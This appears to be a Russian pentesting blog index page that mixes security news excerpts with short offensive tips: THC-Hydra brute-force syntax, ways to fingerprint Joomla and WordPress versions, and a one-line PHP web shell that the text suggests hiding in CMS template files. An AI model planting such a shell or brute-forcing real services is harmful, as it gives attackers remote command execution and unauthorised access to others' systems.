Пентестинг

Информационная безопасность (ИБ), Пентестинг (pentesting), этичный хакинг и анализ на проникновения

BruteForce с помощью THC-Hydra

Если нужен brute force, то Вам поможет THC-Hydra. Она поддерживает подбор для: TELNET, FTP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP-PROXY, LDAP2, LADP3, SMB, SMBNT, MS-SQL, MYSQL, POSTGRES, REXEC, RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, SSH2, Teamspeak, Cisco auth, Cisco enable, Cisco AAA и др.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]

Глава международной хакерской группировки арестован в Нигерии

Благодаря совместным усилиям Интерпола и Комиссии по экономическим и финансовым преступлениям Нигерии в городе Порт-Харкорт арестован глава международной ОПГ, руководивший многочисленными операциями в нескольких странах. 40-летнему подозреваемому, известному под ником «Майк», инкриминируют сотни эпизодов Интернет-мошенничества. Общий ущерб от действий ОПГ составил около $60 млн, притом в одном из случаев жертва лишилась $15,4 млн разом.

АНБ пытается взломать российских хакеров

Американские хакеры из АНБ (Агенство Национальной Безопасности), вероятно, пытаются взломать российские хакерские группировки, чтобы выяснить их причастность к взлому серверов Демократической партии США. Об этом сообщает ABC News со ссылкой на источники в американской разведке.

Глава управления операциями по законному доступу АНБ Роберт Джойс ранее не стал комментировать взлом Демократической партии, однако отметил, что у АНБ есть технические возможности и разрешения для того, чтобы «взломать в ответ» причастные хакерские группировки.

Критическая уязвимость позволяет перехватывать весь сетевой трафик юзеров Windows

Исследователи из ИБ-подразделения компании Tencent под названием Xuanwu Lab обнаружили серьезную ошибку в реализации протокола NetBIOS, использующейся в Windows. Критическая уязвимость получила название BadTunnel — она позволяет злоумышленникам полностью контролировать сетевой трафик жертвы.

В чем проблема?

Владимир Путин подписал пакет законов Яровой

Президент России Владимир Путин подписал антитеррористический пакет законов, разработанный депутатом Ириной Яровой, а также главой комитета Совфеда по обороне и безопасности Виктором Озеровым. Об этом, как передает корреспондент «Ленты.ру», сообщил пресс-секретарь главы государства Дмитрий Песков.

Европу атакуют фишинговые SMS или смишеры

В 2016 году компания FireEye зафиксировала несколько фишинговых SMS-кампаний на территории Западной Европы. За период с февраля по июнь было обнаружено 55 вредоносных бинарников, используемых в этих атаках; примечательно, что во всех случаях так называемые смишеры распространяли ссылки на оверлейных Android-зловредов.

Как определить номер версии в CMS Joomla! и Wordpress?

Иногда, в качестве разведки, нужно определить точную версию CMS работающую на удаленном хосте. Это можно сделать разными путями, сегодня мы рассмотрим CMS Joomla! и Wordpress.

У Joomla! есть путь с раскрытием версии - www.site.ru/language/en-GB/en-GB.xml
И мета-тег, если не отключен параметр "Показывать версию Joomla!"  <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />

PHP web Shell

Иногда нужно внедрить web shell на сайты с CMS Joomla! и Wordpress. Для управления и изучения структур каталогов web-сервера. Чаще всего они размещаются в файлах шаблонов, чтобы они были незаметны. И их там и стоит искать в первую очередь при различных взломах Ваших сайтов и поражении вирусами...
<?if (isset($_GET['cmd'])) system($_GET['cmd']) ?>

Информация дана исключительно в ознакомительных целях!

Как на принятие «пакета Яровой» отреагировали IT-индустрия, Эдвард Сноуден и Павел Дуров?

Госдума РФ приняла сразу во втором и третьем чтениях так называемый «антитеррористический пакет» законопроектов (№1039149-6), разработанный депутатом Ириной Яровой и сенатором Виктором Озеровым. СМИ уже назвали законопроект «самым жестким за много лет», и представители индустрии в целом согласны с мнением журналистов.

Марк Цукерберг заклеивает камеру и микрофон на своем ноутбуке...

И на сегодня одна из главных новостей о тотальном контроле и отсутствии анонимности... "Марк Цукерберг заклеивает камеру на своем ноутбуке..."

RSS-материал